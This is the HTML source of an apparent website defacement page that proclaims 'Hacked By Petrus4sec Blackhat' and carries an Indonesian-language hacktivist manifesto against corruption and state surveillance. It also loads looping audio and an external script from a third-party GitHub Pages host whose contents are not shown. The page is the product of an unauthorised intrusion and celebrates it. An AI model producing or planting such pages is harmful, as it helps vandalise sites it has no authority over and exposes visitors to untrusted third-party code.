<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="icon" href="https://raw.githubusercontent.com/kellz-stack/in/refs/heads/main/IMG_20250218_125001_087.jpg" type="image/x-icon" />
    <meta name="keywords" content="Hacked By Petrus4sec Blackhat" />
    <meta name="description" content="Hacked By Petrus4sec Blackhat" />
    <meta name="author" content="Hacked By Petrus4sec Blackhat" />
    <meta name="theme-color" content="#343a40" />
    <meta property="og:title" content="Hacked By Petrus4sec Blackhat" />
    <meta property="og:description" content="Hacked By Petrus4sec Blackhat" />
    <title> Hacked By Petrus4sec Blackhat </title>
    <link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css" />
    <style>
      body {
        color: #ffffff;
        font-family: "Kelly Slab", sans-serif;
        height: 100vh;
        margin: 0;
        padding: 0;
        background-color: black;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        text-align: center;
      }
      img {
        max-width: 90vw;
        max-height: 50vh;
      }
      .content {
        max-width: 90%;
      }
      audio {
        margin-top: 10px;
      }
    </style>
  </head>
  <body>
    <div class="content">
      <img src="https://files.catbox.moe/gqjbmr.jpeg" alt="Hacked By Petrus4sec ft ./freedommsecurity ft liushen" />
      <h1 style="color: red; font-size: 50px">[+] Hacked By Petrus4sec Blackhat Was heree[+]</h1>
      <h1 style="color: red; font-size: 50px">[+] FT ./FREDOOMSECURITY FT LIUSHEN!!!![+]</h1>
      <div style="font-size: 30px; color: white; line-height: 1.5;">
        <b>We Are Hacktivist Pakistan and Anonymous</b> "Indonesia Gelap: Negeri yang Menyembah Bayangan"
Indonesia, negeri yang katanya kaya raya, tapi rakyatnya masih hidup dalam gelap. Gelap bukan cuma karena mati lampu, tapi karena nurani yang udah lama mati. Negara ini bukan miskin sumber daya, tapi miskin kejujuran. Tanah subur, laut luas, tambang emas—tapi yang menikmati cuma segelintir elit yang tidur di atas dosa.
Korupsi udah jadi budaya, bukan lagi kejahatan. Dari tingkat RT sampai istana, semua bisa dibeli—asal punya kuasa, punya uang, punya koneksi. Hukum hanya tajam ke bawah, tumpul ke atas. Yang lemah dipenjara, yang kuat duduk di kursi kekuasaan sambil senyum di kamera.
Rakyat? Diperalat. Dijadikan angka saat pemilu, dijadikan komoditas saat butuh suara. Janji manis bertebaran seperti sampah di sungai—mengambang, busuk, dan akhirnya hanyut entah ke mana. Pendidikan murah katanya? Tapi sekolah masih jual lembar kerja. Kesehatan gratis katanya? Tapi rumah sakit penuh, obat mahal, dan yang miskin disuruh pulang.
Media pun ikut menari di atas panggung kebohongan. Yang diberitakan bukan kebenaran, tapi apa yang menguntungkan. Suara-suara kritis dibungkam, dianggap makar. Bicara jujur dianggap berbahaya. Sementara mereka yang merusak negeri dilindungi, disucikan, dan disanjung.
Indonesia hari ini bukan rumah untuk rakyat, tapi pasar untuk para penguasa rakus. Di balik bendera merah putih, tersembunyi luka yang menganga. Bangsa ini berdiri di atas penderitaan, dan terus melangkah dengan mata tertutup.
Indonesia gelap. Bukan karena tak ada cahaya. Tapi karena terlalu banyak orang yang menutup mata.<br>
        <b>Terima kasih pemimpin, karena telah mengajarkan kami arti dari kata ‘pengkhianatan digital’.</b>
        <br><br>
        #IndonesiaCemas #FuckNegaraGelap #OkegasOkegasGenerasiCemas #DataKamiBukanMainan #Omon Omon 19 juta lapangan kerja #RakyatDiawasiNegaraDijual #KamiTidakLupa #KedaulatanDigitalHargaMati
      </div>

      <script>
        document.addEventListener("click", function playAudio() {
          var audio = new Audio("https://k.top4top.io/m_33314q0hs1.mp3");
          audio.loop = true;
          audio.play().catch((error) => console.log("Autoplay gagal:", error));
          document.removeEventListener("click", playAudio);
        });
      </script>

    </div>
    <script type="text/javascript" src="https://drvee07.github.io/loc/drv.js"></script>
  </body>
</html>